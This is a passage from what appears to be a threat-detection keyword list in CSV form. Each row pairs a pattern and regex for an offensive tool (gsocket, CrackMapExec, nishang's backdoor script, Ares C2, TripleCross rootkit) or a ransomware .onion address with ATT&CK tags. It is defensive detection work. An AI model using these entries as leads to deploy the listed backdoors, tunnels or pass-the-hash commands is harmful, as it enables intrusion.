Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46757" "*gsocket ssh *",".{0,1000}gsocket\sssh\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46758" "*gsocket ssh *",".{0,1000}gsocket\sssh\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46759" "*gsocket*/gsocket.h*",".{0,1000}gsocket.{0,1000}\/gsocket\.h.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46760" "*GSOCKET*Lclient_gs.log*",".{0,1000}GSOCKET.{0,1000}Lclient_gs\.log.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46761" "*gsocket.1.html*",".{0,1000}gsocket\.1\.html.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46762" "*gsocket.io/deploy*",".{0,1000}gsocket\.io\/deploy.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46763" "*gsocket.io/deploy*",".{0,1000}gsocket\.io\/deploy.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46764" "*gsocket.io/install.sh*",".{0,1000}gsocket\.io\/install\.sh.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46765" "*gsocket/gsocket.h*",".{0,1000}gsocket\/gsocket\.h.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46766" "*gsocket_1.*.deb*",".{0,1000}gsocket_1\..{0,1000}\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46767" "*GSOCKET_ARGS=*",".{0,1000}GSOCKET_ARGS\=.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46768" "*gsocket_linux-aarch64.tar.gz*",".{0,1000}gsocket_linux\-aarch64\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46769" "*gsocket_linux-arm.tar.gz*",".{0,1000}gsocket_linux\-arm\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46770" "*gsocket_linux-armv6.tar.gz*",".{0,1000}gsocket_linux\-armv6\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46771" "*gsocket_linux-armv7l.tar.gz*",".{0,1000}gsocket_linux\-armv7l\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46772" "*gsocket_linux-i686.tar.gz*",".{0,1000}gsocket_linux\-i686\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46773" "*gsocket_linux-mips32.tar.gz*",".{0,1000}gsocket_linux\-mips32\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46774" "*gsocket_linux-mips64.tar.gz*",".{0,1000}gsocket_linux\-mips64\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46775" "*gsocket_linux-mipsel.tar.gz*",".{0,1000}gsocket_linux\-mipsel\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46776" "*gsocket_linux-x86_64.tar.gz*",".{0,1000}gsocket_linux\-x86_64\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46777" "*gsocket_macOS.tar.gz*",".{0,1000}gsocket_macOS\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46778" "*gsocket_macOS.tar.gz*",".{0,1000}gsocket_macOS\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46779" "*gsocket_openbsd-x86_x64.tar.gz*",".{0,1000}gsocket_openbsd\-x86_x64\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46780" "*GSOCKET_SECRET*",".{0,1000}GSOCKET_SECRET.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content #linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46781" "*GSOCKET_SOCKS_IP*",".{0,1000}GSOCKET_SOCKS_IP.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content #linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46782" "*GSOCKET_SOCKS_IP*",".{0,1000}GSOCKET_SOCKS_IP.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46783" "*GSOCKET_SOCKS_IP=*",".{0,1000}GSOCKET_SOCKS_IP\=.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content #linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46784" "*GSOCKET_SOCKS_PORT*",".{0,1000}GSOCKET_SOCKS_PORT.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content #linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46785" "*gsocket-1.*.tar.gz*",".{0,1000}gsocket\-1\..{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46786" "*gsocket-relay/monitor/*",".{0,1000}gsocket\-relay\/monitor\/.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46787" "*gsocket-tor/*",".{0,1000}gsocket\-tor\/.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46788" "*gsocket-tor\*",".{0,1000}gsocket\-tor\\.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46789" "*gs-root-shell-key.txt*",".{0,1000}gs\-root\-shell\-key\.txt.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46790" "*gs-sftp -l*",".{0,1000}gs\-sftp\s\-l.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46791" "*gs-sftp -s thctestserver*",".{0,1000}gs\-sftp\s\-s\sthctestserver.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46792" "*GTFOBLookup*",".{0,1000}GTFOBLookup.{0,1000}","offensive_tool_keyword","GTFOBLookup","Offline command line lookup utility for GTFOBins and LOLBAS.","T1059 - T1110 - T1216 - T1220","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/nccgroup/GTFOBLookup","1","1","N/A","N/A","N/A","3","277","39","2023-06-16T22:01:43Z","2019-09-23T16:00:18Z","46794" "*gtfonow.py -a*",".{0,1000}gtfonow\.py\s\-a.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","46795" "*gtunnel_%s.log*",".{0,1000}gtunnel_\%s\.log.{0,1000}","offensive_tool_keyword","gTunnel","tunneling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","46796" "*gtworek/Priv2Admin*",".{0,1000}gtworek\/Priv2Admin.{0,1000}","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","N/A","10","2124","286","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z","46797" "*guardicore*monkey*",".{0,1000}guardicore.{0,1000}monkey.{0,1000}","offensive_tool_keyword","Github Username","Welcome to the Infection Monkey! 
The Infection Monkey is an open source security tool for testing a data center's resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self propagate across a data center and reports success to a centralized Monkey Island server","T1566 - T1569 - T1570 - T1571 - T1572 - T1573","TA0007 - TA0008","N/A","N/A","Exploitation tool","https://github.com/h0nus","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","46798" "*guardicore/monkey*",".{0,1000}guardicore\/monkey.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","46799" "*guerillamailaccount@sharklasers.com*",".{0,1000}guerillamailaccount\@sharklasers\.com.{0,1000}","offensive_tool_keyword","Dispossessor","email used by the Dispossessor ransomware group notes for data exfiltration","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Data Exfiltration","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#email","N/A","10","10","N/A","N/A","N/A","N/A","46800" "*Guest User Policy: Guest users have the same access as members (most inclusive)*",".{0,1000}Guest\sUser\sPolicy\:\sGuest\susers\shave\sthe\ssame\saccess\sas\smembers\s\(most\sinclusive\).{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","46801" "*guida.exe -*",".{0,1000}guida\.exe\s\-.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of 
another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/foxlox/GIUDA","1","0","N/A","N/A","9","5","469","68","2025-03-30T20:42:43Z","2023-07-19T15:37:07Z","46802" "*gunicorn ares:app*",".{0,1000}gunicorn\sares\:app.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","N/A","10","10","1588","477","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z","46803" "*gunyhng6pabzcurl7ipx2pbmjxpvqnu6mxf2h3vdeenam34inj4ndryd.onion*",".{0,1000}gunyhng6pabzcurl7ipx2pbmjxpvqnu6mxf2h3vdeenam34inj4ndryd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","46804" "*Gupt-Backdoor.ps1*",".{0,1000}Gupt\-Backdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46805" "*Gupt-Backdoor.ps1*",".{0,1000}Gupt\-Backdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46806" "*gustanini/PowershellTools*",".{0,1000}gustanini\/PowershellTools.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","1","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","46807" "*gvka2m4qt5fod2fltkjmdk4gxh5oxemhpgmnmtjptms6fkgfzdd62tad.onion*",".{0,1000}gvka2m4qt5fod2fltkjmdk4gxh5oxemhpgmnmtjptms6fkgfzdd62tad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","46808" "*Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg==*",".{0,1000}Gw3kg8e3ej4ai9wffn\%2Fd0uRqKzyaPfM2UFq\%2F8dWmoW4wnyKZhx07Bg\=\=.{0,1000}","offensive_tool_keyword","padre","padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/glebarez/padre","1","0","#base64","N/A","8","3","253","24","2024-05-13T14:28:25Z","2019-12-30T13:52:03Z","46809" 
"*gwisin4yznpdtzq424i3la6oqy5evublod4zbhddzuxcnr34kgfokwad.onion*",".{0,1000}gwisin4yznpdtzq424i3la6oqy5evublod4zbhddzuxcnr34kgfokwad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","46810" "*gwvueqclwkz3h7u75cks2wmrwymg3qemfyoyqs7vexkx7lhlteagmsyd.onion*",".{0,1000}gwvueqclwkz3h7u75cks2wmrwymg3qemfyoyqs7vexkx7lhlteagmsyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","46811" "*-H lm-hash:nt-hash*",".{0,1000}\-H\slm\-hash\:nt\-hash.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","46812" "*-H 'LMHASH:NTHASH'*",".{0,1000}\-H\s\'LMHASH\:NTHASH\'.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","46813" "*-H 'NTHASH'*",".{0,1000}\-H\s\'NTHASH\'.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","46814" "*h2csmuggler --scan-list *",".{0,1000}h2csmuggler\s\-\-scan\-list\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46815" "*h2csmuggler -x * --test*",".{0,1000}h2csmuggler\s\-x\s.{0,1000}\s\-\-test.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46816" "*h3GywpDrP6gJEdZ6xbJbZZVFmvFZDCa4KcRd*",".{0,1000}h3GywpDrP6gJEdZ6xbJbZZVFmvFZDCa4KcRd.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","46817" "*h3xduck/TripleCross*",".{0,1000}h3xduck\/TripleCross.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense 